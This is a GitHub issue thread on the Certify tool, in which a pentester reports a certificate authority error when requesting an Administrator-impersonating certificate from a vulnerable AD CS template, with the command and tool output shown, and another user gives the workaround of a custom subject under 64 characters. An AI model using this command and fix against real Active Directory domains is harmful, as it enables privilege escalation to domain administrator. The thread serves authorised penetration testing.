GhostPack / Certify

Active Directory certificate abuse.

The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT) #30

Open sm00v opened 1 year ago

sm00v commented 1 year ago

Getting this error while running: certify.exe request /ca:CASERVER.thisisalongdomainlol.com\Issuing-External-CA /template:VulnTemplate /altname:Administrator

My subject name according to certify is: CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com

Any ideas on how to deal with this error? Sounds like a legitimate issue for which you have to permit subject names longer than 64 characters on the ADCS server, according to this: https://www.open-a-socket.com/2014/07/24/the-request-subject-name-is-invalid-or-too-long/

Below is the full output with redacted info. This pentest is about to end, but it might help the next person if this gets answered.

[*] Current user context    : thisisalongdomainlol\Contos
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate 
[*] Subject                 : CN=TEST2\,  Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
[*] AltName                 : administrator

[*] Certificate Authority   : CASERVER.thisisalongdomainlol.com\Issuing-External-CA

[!] CA Response             : The submission failed: Error Parsing Request  The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
[!] Last status             : 0x80094001
[*] Request ID              : 0

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
abcde
-----END RSA PRIVATE KEY-----

[X] Error downloading certificate: CCertRequest::RetrievePending: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:08.5331567

Hopefully there is something that can be done rather than running a command on the AD CS server :/

funnybananas commented 1 year ago

I'm experiencing this same problem. Anyone found a workaround? Could supplying the /subject yourself work?

funnybananas commented 10 months ago

For anyone having the same problem, this fixed it. Just provide your own subject and make sure it's less than 64 characters.